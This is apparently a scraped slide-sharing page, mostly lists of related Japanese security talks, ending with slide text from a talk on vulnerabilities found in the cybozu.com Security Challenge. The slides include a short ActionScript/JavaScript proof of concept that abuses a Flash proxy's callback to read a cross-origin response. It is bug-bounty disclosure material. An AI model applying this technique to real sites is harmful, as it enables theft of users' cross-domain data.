Recommended
PDF
PPTX
XSSフィルターを利用したXSS攻撃 by Masato Kinugawa
PDF
PPTX
20181117-一般的な脆弱性の概要・対策を知り、ZAPで見つけてみよう!
PPTX
PDF
PPTX
ブラウザとWebサーバとXSSの話@Shibuya.xss
PDF
PDF
PDF
PPTX
PPTX
PPTX
PDF
PDF
ITPと、その他cookie関連のこと / ITP and cookie
PDF
PDF
PDF
PPTX
SecurityCamp2015「バグハンティング入門」
PDF
X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~
PDF
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
PDF
HES 2012- Killing a Bug Bounty Program by Itzhak Zuk Avraham&Nir Goldshlager
PDF
iPhone Data Protection in Depth
PDF
Antid0te 2.0 – ASLR in iOS
PDF
iOS 6 Exploitation: 280 days later
PDF
Hacking Webkit & Its JavaScript Engines
PDF
Attacking the Webkit heap [Or how to write Safari exploits]
PDF
PDF
PPTX
SecurityCamp2015「CVE-2015-4483解説」
More Related Content
PDF
PPTX
XSSフィルターを利用したXSS攻撃 by Masato Kinugawa
PDF
PPTX
20181117-一般的な脆弱性の概要・対策を知り、ZAPで見つけてみよう!
PPTX
PDF
PPTX
ブラウザとWebサーバとXSSの話@Shibuya.xss
PDF
What's hot
PDF
PDF
PPTX
PPTX
PPTX
PDF
PDF
ITPと、その他cookie関連のこと / ITP and cookie
PDF
PDF
PDF
Viewers also liked
PPTX
SecurityCamp2015「バグハンティング入門」
PDF
X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~
PDF
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
PDF
HES 2012- Killing a Bug Bounty Program by Itzhak Zuk Avraham&Nir Goldshlager
PDF
iPhone Data Protection in Depth
PDF
Antid0te 2.0 – ASLR in iOS
PDF
iOS 6 Exploitation: 280 days later
PDF
Hacking Webkit & Its JavaScript Engines
PDF
Attacking the Webkit heap [Or how to write Safari exploits]
PDF
PDF
PPTX
SecurityCamp2015「CVE-2015-4483解説」
PPT
SenchaCon 2016: Expect the Unexpected - Dealing with Errors in Web Apps
PPTX
SenchaCon 2016: JavaScript is Great but Stop Writing It - Rory Hardy
PPTX
SenchaCon 2016: Improve Workflow Driven Applications with Ext JS Draw Package...
PPTX
SenchaCon 2016: Handle Real-World Data with Confidence - Fredric Berling
PPTX
PDF
20160416 Azure Data Lakeのはまりどころ
PPT
SenchaCon 2016: Add Magic to Your Ext JS Apps with D3 Visualizations - Vitaly...
PDF
めとべや東京10 Universal Windows Platform appの新しいバインディング
Similar to 見つけた脆弱性について(cybozu.com Security Challenge)
PPTX
Cybozu.com security challengeに参加したよ
PPTX
XSSの評価基準とRIPSプラグイン的なものを作った
PPTX
ODP
ライブコーディングとデモで理解するWebセキュリティの基礎
PDF
機械学習でWebアプリの脆弱性を見つける - Reflected XSS 編 -
PPTX
Webサイトをめぐるセキュリティ状況と効果的な防御方法(WordPress編)
PPTX
Railsエンジニアのためのウェブセキュリティ入門
PPTX
PDF
PDF
セキュリティ未経験だったけど入社1年目から Bug Bounty Program 運営に参加してみた
PPTX
【XSS Bonsai】 受賞のご挨拶 by @ymzkei5 【SECCON 2014】 - Dec 08, 2014
PDF
PDF
LINE Security Bug Bounty Program について
PPTX
MBSD Cybersecurity Challenges 2018
PPTX
MBSD Cybersecurity Challenges 2018
PPTX
cybozu.com Security Challenge 結果報告
PPTX
DeNAtechcon_DeNAのセキュリティの取り組みと、スマートフォンセキュリティ(same-origin policy)
PPTX
PPTX
クラック・サイト改ざんが発覚!被害の実例・事後対処は?
PDF
見つけた脆弱性について(cybozu.com Security Challenge) 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 具体的に
ExternalInterface.addCallback("jsFunc", send);
//省略
public function send(uri:string):void{
var loader:URLLoader = new URLLoader();
var request:URLRequest = new URLRequest(uri);
loader.load(request);
//省略
ExternalInterface.call("util.xdr",responseText);
util={};util.xdr=function(a){alert(a)}//上書き
swf.jsFunc("http://app.cybozu-dev.com/target")
//レスポンスがalertされる
AS
JS
21. 22. 23. 24.